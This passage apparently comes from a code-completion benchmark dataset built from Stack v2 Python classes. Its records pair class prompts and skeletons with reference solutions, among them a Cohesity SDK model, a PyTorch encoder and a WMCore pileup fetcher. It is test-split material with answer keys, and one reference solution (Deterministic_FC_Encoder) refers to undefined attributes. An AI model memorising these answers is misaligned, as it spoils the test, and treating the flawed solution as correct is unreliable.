task_type (string): Specifies the task type.\n\nMethod signatures and docstrings:\n- def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None): Constructor for the DataTransferFromVaultPerTask class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `DataTransferFromVaultPerTask` described below.\n\nClass description:\nImplementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\n\nMethod signatures and docstrings:\n- def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None): Constructor for the DataTransferFromVaultPerTask class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. 
task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/data_transfer_from_vault_per_task.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "e027a9183c2c149dd94aeeaa48900e5a483960bd", "bodies": ["super().__init__()\nself._feature_dim = config[0]\nself._hidden_dim = config[1]\nself._output_dim = config[2]\nself._layer_count = config[3]\nself._layers = nn.ModuleList([])\nfor i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))", "num_task, n_way, k_shot, feature_dim = inputs.shape\ninputs = inputs.view(-1, feature_dim)\nhidden = inputs\nfor i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\nhidden = hidden.view(num_task, n_way, k_shot, -1)\nhidden = self._last_layer(hidden)\noutput_dim = hidden.size(-1)\nkl_loss = None\nreturn (hidden, kl_loss)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n<|end_body_0|>\n\n<|body_start_1|>\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n<|end_body_1|>\n", "class_docstring": "Deterministic_Conv_Encoder", "class_name": "Deterministic_FC_Encoder", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def __init__(self, config):\n \"\"\"NP\"\"\"\n 
<|body_0|>\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n<|end_body_0|>\n\n<|body_start_1|>\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000067", "length_bytes": 18202, "license_type": "no_license", "methods": [{"docstring": "NP", "name": "__init__", "signature": "def __init__(self, config)"}, {"docstring": "Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :", "name": "forward", "signature": "def forward(self, inputs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000058", "prompt": "Implement the Python class `Deterministic_FC_Encoder` described below.\n\nClass description:\nDeterministic_Conv_Encoder\n\nMethod signatures and docstrings:\n- def __init__(self, config): NP\n- def forward(self, inputs): Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :", "prompted_full_text": "Implement the Python class `Deterministic_FC_Encoder` described below.\n\nClass description:\nDeterministic_Conv_Encoder\n\nMethod signatures and docstrings:\n- def __init__(self, config): NP\n- def forward(self, inputs): Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\n\n<|skeleton|>\nclass Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def __init__(self, config):\n \"\"\"NP\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n<|end_body_0|>\n\n<|body_start_1|>\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n<|end_body_1|>\n", "revision_id": "c7e1bfb49ebaec6937ed7b186689227f95a43e0f", "skeleton": "<|skeleton|>\nclass Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def 
__init__(self, config):\n \"\"\"NP\"\"\"\n <|body_0|>\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Deterministic_FC_Encoder:\n \"\"\"Deterministic_Conv_Encoder\"\"\"\n\n def __init__(self, config):\n \"\"\"NP\"\"\"\n super().__init__()\n self._feature_dim = config[0]\n self._hidden_dim = config[1]\n self._output_dim = config[2]\n self._layer_count = config[3]\n self._layers = nn.ModuleList([])\n for i in range(len(self._filter_sizes)):\n if i == 0:\n self._layers.append(nn.Linear(self._feature_dim, self._hidden_dim))\n if i == self._layer_count - 1:\n self._layers.append(nn.Linear(self._hidden_dim, self._output_dim))\n else:\n self._layers.append(nn.Linear(self._hidden_dim, self._hidden_dim))\n\n def forward(self, inputs):\n \"\"\"Args: input : imamges (num_tasks, n_way, k_shot, feature_dim) Return: output :\"\"\"\n num_task, n_way, k_shot, feature_dim = inputs.shape\n inputs = inputs.view(-1, feature_dim)\n hidden = inputs\n for i, layer in enumerate(self._layers):\n hidden = F.relu(layer(hidden))\n hidden = hidden.view(num_task, n_way, k_shot, -1)\n hidden = self._last_layer(hidden)\n output_dim = hidden.size(-1)\n kl_loss = None\n return (hidden, kl_loss)\n", "source": "the_stack_v2_python_sparse", "source_path": "model/MAML/Part/encoder.py", "source_repo": "MingyuKim87/MLwM", "split": "test", "star_events_count": 0} {"blob_id": "969ba5f67f272118480f3b605466b5c231e24391", "bodies": ["resultDict = {}\nfor pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\nreturn resultDict", "encoder = JSONEncoder()\nurl = helper.data.dbsUrl\nfrom WMCore.Services.DBS.DBSReader import DBSReader\ndbsReader = DBSReader(url)\nconfigDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\njson = encoder.encode(configDict)\nstepPath = '%s/%s' % (self.workingDirectory(), helper.name())\nif not os.path.exists(stepPath):\n os.mkdir(stepPath)\ntry:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\nexcept IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)", "for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)"], "bodies_text": "<|body_start_0|>\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n<|end_body_0|>\n\n<|body_start_1|>\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = 
DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n<|end_body_1|>\n\n<|body_start_2|>\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n<|end_body_2|>\n", "class_docstring": "Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox", "class_name": "PileupFetcher", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n <|body_0|>\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n <|body_1|>\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). 
wmTask is instance of WMTask.WMTaskHelper\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n<|end_body_0|>\n\n<|body_start_1|>\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n<|end_body_1|>\n\n<|body_start_2|>\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000068", "length_bytes": 4412, "license_type": "no_license", "methods": [{"docstring": "Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi", "name": "_queryDbsAndGetPileupConfig", "signature": "def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader)"}, {"docstring": "Stores pileup JSON configuration file in the working directory / sandbox.", "name": "_createPileupConfigFile", "signature": "def _createPileupConfigFile(self, helper)"}, {"docstring": "Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper", "name": "__call__", "signature": "def __call__(self, wmTask)"}], "n_methods": 3, "prompt": "Implement the Python class `PileupFetcher` described below.\n\nClass description:\nPull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\n\nMethod signatures and docstrings:\n- def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader): Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. 
Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\n- def _createPileupConfigFile(self, helper): Stores pileup JSON configuration file in the working directory / sandbox.\n- def __call__(self, wmTask): Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper", "prompted_full_text": "Implement the Python class `PileupFetcher` described below.\n\nClass description:\nPull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\n\nMethod signatures and docstrings:\n- def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader): Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\n- def _createPileupConfigFile(self, helper): Stores pileup JSON configuration file in the working directory / sandbox.\n- def __call__(self, wmTask): Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper\n\n<|skeleton|>\nclass PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. 
BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n <|body_0|>\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n <|body_1|>\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). wmTask is instance of WMTask.WMTaskHelper\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n<|end_body_0|>\n\n<|body_start_1|>\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n<|end_body_1|>\n\n<|body_start_2|>\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n<|end_body_2|>\n", "revision_id": "122f9332f2e944154dd0df68b6b3f2875427b032", "skeleton": "<|skeleton|>\nclass PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n <|body_0|>\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n <|body_1|>\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). 
wmTask is instance of WMTask.WMTaskHelper\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PileupFetcher:\n \"\"\"Pull dataset block/SE : LFN list from DBS for the pileup datasets required by the steps in the job. Save these maps as files in the sandbox\"\"\"\n\n def _queryDbsAndGetPileupConfig(self, stepHelper, dbsReader):\n \"\"\"Method iterates over components of the pileup configuration input and queries DBS. Then iterates over results from DBS. There needs to be a list of files and their locations for each dataset name. Use dbsReader the result data structure is a Python dict following dictionary: FileList is a list of LFNs {\"pileupTypeA\": {\"BlockA\": {\"FileList\": [], \"StorageElementNames\": []}, \"BlockB\": {\"FileList\": [], \"StorageElementName\": []}, ....} this structure preserves knowledge of where particular files of data set are physically (list of SEs) located. DBS only lists sites which have all files belonging to blocks but e.g. BlockA of dataset DS1 may be located at site1 and BlockB only at site2 - it's possi\"\"\"\n resultDict = {}\n for pileupType in stepHelper.data.pileup.listSections_():\n datasets = getattr(getattr(stepHelper.data.pileup, pileupType), 'dataset')\n blockDict = {}\n for dataset in datasets:\n blockNames = dbsReader.listFileBlocks(dataset)\n for dbsBlockName in blockNames:\n blockDict[dbsBlockName] = {'FileList': dbsReader.lfnsInBlock(dbsBlockName), 'StorageElementNames': dbsReader.listFileBlockLocation(dbsBlockName)}\n resultDict[pileupType] = blockDict\n return resultDict\n\n def _createPileupConfigFile(self, helper):\n \"\"\"Stores pileup JSON configuration file in the working directory / sandbox.\"\"\"\n encoder = JSONEncoder()\n url = helper.data.dbsUrl\n from WMCore.Services.DBS.DBSReader import DBSReader\n dbsReader = DBSReader(url)\n configDict = self._queryDbsAndGetPileupConfig(helper, dbsReader)\n json = encoder.encode(configDict)\n stepPath = '%s/%s' % (self.workingDirectory(), helper.name())\n if not os.path.exists(stepPath):\n os.mkdir(stepPath)\n try:\n fileName = '%s/%s' % (stepPath, 'pileupconf.json')\n f = open(fileName, 'w')\n f.write(json)\n f.close()\n except IOError:\n m = \"Could not save pileup JSON configuration file: '%s'\" % fileName\n raise RuntimeError(m)\n\n def __call__(self, wmTask):\n \"\"\"Method is called when WorkQueue creates the sandbox for a job. Need to look at the pileup configuration in the spec and query dbs to determine the lfns for the files in the datasets and what sites they're located at (WQ creates the job sandbox). 
wmTask is instance of WMTask.WMTaskHelper\"\"\"\n for step in wmTask.steps().nodeIterator():\n helper = WMStep.WMStepHelper(step)\n if hasattr(helper.data, 'pileup'):\n self._createPileupConfigFile(helper)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/python/WMCore/WMSpec/Steps/Fetchers/PileupFetcher.py", "source_repo": "cinquo/WMCore", "split": "test", "star_events_count": 1} {"blob_id": "e8d632942b51977f54ed57e3b3dbe11fa8b4f67c", "bodies": ["def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\nlanguage = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\nage = tf.contrib.layers.real_valued_column('age')\ntarget_column = layers.multi_class_target(n_classes=2)\nclassifier = LinearEstimator(target_column, feature_columns=[age, language])\nclassifier.fit(input_fn=input_fn, steps=1000)\nloss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\nclassifier.fit(input_fn=input_fn, steps=2000)\nloss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']\nself.assertLess(loss2, loss1)\nself.assertLess(loss2, 0.01)", "cont_features = [tf.contrib.layers.real_valued_column('feature', dimension=4)]\ntarget_column = layers.multi_class_target(n_classes=3)\nclassifier = DNNEstimator(target_column, feature_columns=cont_features, hidden_units=[3, 3])\nclassifier.fit(input_fn=_iris_input_fn, steps=1000)\nclassifier.evaluate(input_fn=_iris_input_fn, steps=100)"], "bodies_text": "<|body_start_0|>\n def input_fn():\n return ({'age': tf.constant([1]), 'language': tf.SparseTensor(values=['english'], indices=[[0, 0]], shape=[1, 1])}, tf.constant([[1]]))\n language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)\n age = tf.contrib.layers.real_valued_column('age')\n target_column = 